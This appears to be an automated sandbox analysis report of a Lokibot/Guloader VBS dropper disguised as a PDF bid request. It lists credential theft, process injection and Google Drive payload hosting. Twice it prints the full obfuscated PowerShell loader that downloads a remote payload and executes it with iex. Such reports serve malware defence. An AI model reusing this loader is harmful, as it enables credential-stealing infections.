Analysis Overview
SHA256
56477d17f71d7e5912340580f96f8df535b19eb9cb96da14ccf741bcd465ee68
Threat Level: Known bad
The file 56477d17f71d7e5912340580f96f8df535b19eb9cb96da14ccf741bcd465ee68 was found to be: Known bad.
Malicious Activity Summary
Lokibot
Guloader,Cloudeye
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Command and Scripting Interpreter: PowerShell
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Suspicious behavior: MapViewOfSection
outlook_office_path
outlook_win_path
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-09 19:32
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-09 19:32
Reported
2024-09-09 19:35
Platform
win10v2004-20240802-en
Max time kernel
107s
Max time network
142s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4664 set thread context of 4068 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\windows mail\wab.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4068 -ip 4068
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 1728
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 216.58.201.110:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| GB | 216.58.201.110:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.179.227:80 | o.pki.goog | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.170.16.2.in-addr.arpa | udp |
| US | 137.184.191.215:80 | 137.184.191.215 | tcp |
| US | 8.8.8.8:53 | 215.191.184.137.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.191.184.137.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/3976-4-0x00007FFCF89A3000-0x00007FFCF89A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qihdvnke.0tz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3976-14-0x0000027C242C0000-0x0000027C242E2000-memory.dmp
memory/3976-15-0x00007FFCF89A0000-0x00007FFCF9461000-memory.dmp
memory/3976-16-0x00007FFCF89A0000-0x00007FFCF9461000-memory.dmp
memory/3976-18-0x00007FFCF89A3000-0x00007FFCF89A5000-memory.dmp
memory/3976-19-0x00007FFCF89A0000-0x00007FFCF9461000-memory.dmp
memory/4664-21-0x00000000027B0000-0x00000000027E6000-memory.dmp
memory/4664-22-0x0000000005230000-0x0000000005858000-memory.dmp
memory/4664-23-0x00000000051E0000-0x0000000005202000-memory.dmp
memory/4664-24-0x00000000058D0000-0x0000000005936000-memory.dmp
memory/4664-25-0x0000000005940000-0x00000000059A6000-memory.dmp
